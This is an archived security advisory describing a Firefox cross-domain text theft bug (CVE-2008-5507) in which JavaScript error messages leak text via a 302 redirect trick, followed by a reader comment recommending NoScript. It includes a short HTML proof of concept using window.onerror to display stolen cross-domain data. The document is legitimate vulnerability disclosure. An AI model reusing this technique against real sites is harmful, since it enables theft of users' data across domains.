|
|
| |
| A vulnerability in the way Firefox parses Javascript code (through a src tag) without properly restricting it to the same domain allows attackers to access information that is outside their domain restriction, which in turn can be used to preform cross-domain theft. |
| |
Credit:
The information has been provided by Chris Evans.
The original article can be found at: http://scary.beasts.org/security/CESA-2008-011.html
|
| |
Firefoxes 2.0.0.19 and 3.0.5 fix a cross-domain theft of textual data. The theft is via cross-domain information leaks in JavaScript error messages for scripts executed via <script src="remote_domain.org">. The JavaScript error messages are made available to the window.onerror handler. In some cases, JavaScript error messages can contain pieces of text from the remote domain as part of the error message, e.g. "blah is not defined". This permits certain textual constructs to be stolen cross-domain.
The broader issue was fixed in Firefox 3.0. However this fix was not complete. The fix could be dodged by using another instance of the "302 redirect trick". It was possible to cause the browser to believe a remote script was in fact local, and therefore continue to reveal JavaScript error messages.
Proof of concept:
<html>
<body>
You should see an alert box containing a (potentially) sensitive many-bits
hex string stolen cross-domain.
<script>
window.onerror = function(message, uri, line) {
var fullMessage = message + "\n at " + uri + ": " + line;
alert(fullMessage);
return false;
}
</script>
<script src="../redir?url=http://vsftpd.beasts.org/steal_me/hex.txt">
</script>
</body>
</html>
CVE Information:
CVE-2008-5507
|
| Subject:
|
Cross-Domain Text Theft SeaMonkey FireFox |
Date: |
23 Jan. 2009 |
| From: |
wmahiyahoo.com |
Hi,
This problem has been around for quite awhile.
Many sites talk about it but none that I have found suggests an easy way to STOP IT.
I emailed Chris Evans with the fix but he too seems to just care about finding security problems and will not add the Fix to his page.
"e;NoScript"e; is a plug-in for both SeaMonkey and FireFox..
It Works on this security problem.
The 1 thing I suggest to all, is after install of "e;NoScript"e; , Is to Delete everything in the "e;White List"e; and only add Truly Safe Sites,
Have a Great Day
Bill MacGregor
K.I.S.S. CO. Security LLC.
Ps
I sure hope you post this or just the Link to NoScript.
http://noscript.net/ |
|
|
|
|
